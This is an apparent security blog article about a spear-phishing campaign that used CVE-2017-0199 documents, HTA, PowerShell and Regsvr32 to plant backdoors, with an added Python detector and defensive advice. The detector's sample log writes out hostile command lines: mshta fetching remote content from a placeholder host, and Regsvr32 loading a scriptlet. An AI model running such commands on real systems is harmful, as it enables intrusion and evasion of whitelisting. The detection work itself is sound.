Why phish when you can spear phish? According to Trend Micro, this appears to be the purpose behind a recent set of malicious emails aimed at Russian enterprises. Attackers used highly specific, socially persuasive emails to breach corporate security and then leveraged existing Windows components to create persistent backdoors.

When successful, cybercriminals gained the ability to download and delete files, download new scripts, terminate running scripts and run shell commands. This raises the question: How can enterprises sidestep the spear and make sure employees don’t get phished?

Backdoor Break-Ins

As noted by the Trend Micro piece, malicious actors used a combination of existing exploits and legitimate Windows functions to create a reliable and sophisticated backdoor system. Researchers observed at least five runs of emails occurring from June 23 to July 27 this year. Each run sent multiple emails per target, using different emails for each run and for each target.

Infections began with emails that appeared to be from sales or billing departments with subject lines such as “rules for connecting to the gateway” or “payment of state duties.” The emails contained a legitimate-looking .doc attachment, which was actually a customized rich text format (RTF) file that exploited the known vulnerability CVE-2017-0199 in Microsoft Office’s Object Linking and Embedding (OLE) interface.

This exploit let threat actors download a fake Excel spreadsheet that Windows actually treats as an HTML application (HTA) embedded with malicious JavaScript. It then ran two PowerShell scripts: one decoy and one that grabbed a DLL file. This DLL then dropped another file in the %AppData% folder with a .txt extension, which was actually a scriptlet file loaded with more JavaScript.

The new file was loaded through Regsvr32, a legitimate Windows utility, to bypass restrictions on running scripts and evade application whitelisting. Finally, another XML file was downloaded to serve as the primary backdoor.

Sound convoluted? It is — and purposefully so. The combination of continued obfuscation and abuse of legitimate command structures makes it extremely difficult to detect this malware in progress or remove backdoor code once it’s embedded in the system.
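The chain is convoluted, but each hop in it is visible in process-creation telemetry: an Office application spawning a script host, mshta.exe fetching remote content, one script host launching another, and Regsvr32 being pointed at a scriptlet instead of a DLL. The following detector, an added example that is not Trend Micro's or the article's code, runs those four checks over a constructed, simplified Sysmon-style log (`timestamp|ParentImage|Image|CommandLine` per line); the paths, hostnames and file names in the sample are hypothetical.

```python
"""Flag the Office -> HTA -> PowerShell -> Regsvr32 scriptlet chain in process logs.

Added example, not the article's or Trend Micro's code. Input is a constructed,
simplified 'ts|ParentImage|Image|CommandLine' log; real Sysmon Event ID 1 data
would need a different parser but the same rules.
"""
import re
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"mshta.exe", "powershell.exe", "cmd.exe", "regsvr32.exe",
                "wscript.exe", "cscript.exe"}

# Constructed sample: one infection chain plus two benign control events.
SAMPLE_LOG = r"""
2017-07-10T09:12:01|explorer.exe|C:\Program Files\Microsoft Office\Office16\WINWORD.EXE|"WINWORD.EXE" /n "C:\Users\alice\Downloads\invoice.doc"
2017-07-10T09:12:05|WINWORD.EXE|C:\Windows\System32\mshta.exe|mshta.exe http://example.invalid/report.xls
2017-07-10T09:12:07|mshta.exe|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell.exe -nop -w hidden -File C:\Users\alice\AppData\Local\Temp\stage.ps1
2017-07-10T09:12:12|powershell.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s /u /i:C:\Users\alice\AppData\Roaming\update.txt scrobj.dll
2017-07-10T09:15:00|explorer.exe|C:\Windows\System32\regsvr32.exe|regsvr32.exe /s C:\Program Files\Vendor\vendor.dll
2017-07-10T09:20:00|services.exe|C:\Windows\System32\svchost.exe|svchost.exe -k netsvcs
"""


@dataclass
class Event:
    ts: str
    parent: str
    image: str
    cmdline: str


def parse_events(text: str) -> list[Event]:
    """Parse the simplified pipe-delimited log; blank lines are skipped."""
    events = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, parent, image, cmdline = line.split("|", 3)
        events.append(Event(ts, parent, image, cmdline))
    return events


def basename(path: str) -> str:
    """Lower-cased file name of a Windows or POSIX path."""
    return re.split(r"[\\/]", path)[-1].lower()


# Regsvr32's /i: argument names the install target; for a DLL it is a DLL path.
SCRIPTLET_ARG = re.compile(r"/i:(\S+)", re.IGNORECASE)


def analyze(events: list[Event]) -> list[tuple[str, str, str]]:
    """Return (timestamp, rule_name, detail) for every event matching a rule."""
    findings = []
    for e in events:
        parent, image, cmd = basename(e.parent), basename(e.image), e.cmdline.lower()

        # Rule 1: an Office document should not be launching script hosts.
        if parent in OFFICE_APPS and image in SCRIPT_HOSTS:
            findings.append((e.ts, "office_spawns_script_host", f"{parent} -> {image}"))

        # Rule 2: script hosts chaining into each other (mshta -> powershell -> regsvr32).
        if parent in SCRIPT_HOSTS and image in SCRIPT_HOSTS:
            findings.append((e.ts, "script_host_chain", f"{parent} -> {image}"))

        # Rule 3: mshta pulling an "HTML application" from a remote URL.
        if image == "mshta.exe" and ("http://" in cmd or "https://" in cmd):
            findings.append((e.ts, "mshta_remote_content", e.cmdline))

        # Rule 4: regsvr32 given a scriptlet (scrobj.dll), a URL, or a non-DLL
        # file under AppData instead of a real DLL to register.
        if image == "regsvr32.exe":
            m = SCRIPTLET_ARG.search(e.cmdline)
            target = m.group(1).lower() if m else ""
            remote = target.startswith("http")
            appdata_nondll = "appdata" in target and not target.endswith(".dll")
            if "scrobj.dll" in cmd or remote or appdata_nondll:
                findings.append((e.ts, "regsvr32_scriptlet_abuse", e.cmdline))
    return findings


if __name__ == "__main__":
    for ts, rule, detail in analyze(parse_events(SAMPLE_LOG)):
        print(f"{ts}  {rule:28}  {detail}")
```

The benign `regsvr32.exe /s ...\vendor.dll` line is deliberately included as a control: a rule that only keys on the image name would fire on every legitimate DLL registration, which is exactly the noise that lets the real chain hide. Correlating parent/child pairs and the `/i:` target keeps the alert specific to the behaviour described above.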

Staying Safe From Malicious Emails

While late-chain functions of this backdoor campaign are hard to detect — let alone stop — most phishing and spear phishing attacks start the same way: malicious emails.

For many enterprises, it’s tempting to view email security as something so basic, so necessary and so frequently addressed that employees couldn’t possibly allow cybercriminals to gain system access. According to CNN, however, a self-described email prankster managed to fool multiple employees of the U.S. government by posing as high-profile individuals. While no state secrets were spilled or networks breached, the prank shows just how easily legitimate-looking emails can slip past staff.

So how can companies sidestep the spear? Start by warning staff never to open attachments they’re not 100 percent sure about, then follow up by enforcing strict patch management for Microsoft Office and turning off auto-run for .doc macros.

It’s also a good idea to ensure that users possess only the network privileges they need for day-to-day tasks. Organizations should also blacklist specific command interpreters or rarely used applications. Trend Micro noted that this “could affect legitimate system functions,” but a slight loss of convenience is a small price compared to a persistent backdoor.

Malicious emails are spearing Russian enterprises. Stay safe by recognizing the telltale tip of the phishing spear, training employees to err on the side of caution, and taking steps to limit application and network permissions.
